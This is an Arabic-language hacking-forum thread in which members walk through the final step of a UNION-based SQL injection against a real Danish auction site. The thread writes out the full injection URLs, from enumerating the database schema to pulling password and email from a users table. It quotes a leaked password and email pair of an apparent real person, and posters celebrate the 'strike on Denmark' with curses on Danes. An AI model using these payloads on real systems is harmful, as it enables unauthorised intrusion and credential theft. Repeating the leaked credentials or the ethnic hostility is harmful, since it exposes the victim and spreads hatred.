:: vBspiders Professional Network :: - خطوه اخيره بثغره حقن ؟

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)

- جـــ'ابات العناكــ'ب (http://www.vbspiders.com/vb/forumdisplay.php?f=343)

- - خطوه اخيره بثغره حقن ؟ (http://www.vbspiders.com/vb/showthread.php?t=22439)

خطوه اخيره بثغره حقن ؟

اساتذتي الكرام

السلام عليكم

موقع مصاب بثغره الحقن

كل الحقنات نجحت ولبت المطلوب

الا الحقنه الاخيرة عند الاستعلام عن الايميل والباسوورد للادمن
هذه الحقنه م قبل الاخيرة ؟؟

كود PHP:

   http*****/****?id=160+and+1=0+union+select+concat(table_name,0x3a,column_name,0x3a,table_schema),2,3,4,5,6,7,8,9,10,11,12+from+information_schema.columns+where+table_name=0x74656d705f7573657273--

وعند الاستعلام عن الايميل والباس

لم تلبي المطلوب

وهذه الحقنه ؟

كود PHP:

   http://www.****.com/viewAuction.php?id=160+and+1=0+union+select+concat(password,0x3a,email),2,****7,8,9,10,11,12+from+temp_users--

أود ان اعرف اين الخطأ بهذه الحقنه ؟؟
لاستفيد من خطأي بالمرات القادمه ؟؟

ولكم الشكر اساتذتي المميزون

بر[ب]

.

الحقنه الاخير يلي انت واضعها
هذا الناتج تاعها

اقتباس:

Auktion nr.: 160 and 1=0 union select concat(password,0x3a,email),2,3,4,5,6,7,8,9,10,11, 12 from temp_users-- em120978:esben-78@madsen.mail.dk

اذا انت منتبه
الناتج موجود
هو

اقتباس:

em120978:esben-78@madsen.mail.dk

يلا اخي المره الجاي انتبه :)
ومبروك الضربه للدنمارك لعنه الله عليهم

واصل يا ورحي

استازي الغالي

بالحقنه الاخيره لم يظهر لي م ظهر عندك

لم تظهر النتيجه اللتي اشرت لها

وهذه صورة توضح ناتج الحقنه الاخيره عندي

تفضل

http://dc05.arabsh.com/i/00793/od9o6l9h5lei.bmp

وهل من نفس الصفحه يتم دخول الادمن

لان هناك لوحه دخول ظاهره بالصفحه الرئيسيه

فانا تواق جدا للوصول للوحه الادمن

لعنت الله على الدانمركيين

شاكر جهودك

بر[ب]

ربنا يخليك ركز معي :)

اولا طلعنا الاعمده وكان هيك الاستغلال

اقتباس:

http://www.damb2b.com/viewAuction.ph...8,9,10,11,12--

الان انت عرفت انو العمود رقم واحد هو المصاب
ممكن تركز بالناتج وتقلي وين مكتوب رقم واحد

طبعا هذا الناتج

اقتباس:

Auktion nr.: 160 and 1=0 union select 1,2,3,4,5,6,7,8,9,10,11,12-- 1

لونته انا بالاحمر لحتى تركز ع الناتج
والان خلينا نضع الاستغلال الكامل ونشوف ايش بطلع معانا مكان العمود رقم 1
--------

هذا الاستغلال حسب ما انت مطلعه

اقتباس:

http://www.damb2b.com/viewAuction.php?id=160+and+1=0+union+select+concat (password,0x3a,email),2,3,4,5,6,7,8,9,10,11,12+fro m+temp_users--

الان نشوف الناتج ايش مع التركيز ع مكان العمود المصاب

كود PHP:

   [B]Auktion nr.: 160 and 1=0 union select concat(password,0x3a,email),2,3,4,5,6,7,8,9,10,11,12 from temp_users-- em120978:esben-78@madsen.mail.dk[/B]

زي ما انت ملاحظ ظهر مكان العمود المصاب
الكتابه التاليه

em120978:esben-78@madsen.mail.dk

اتمنا وضحت الفكره
للاسف الموقع بطيء ولا كان ارفقت لك صوره للكلام يلي بحكي عنه
وصار الاشي اوضح

كل الشكر لك استازي الفاضل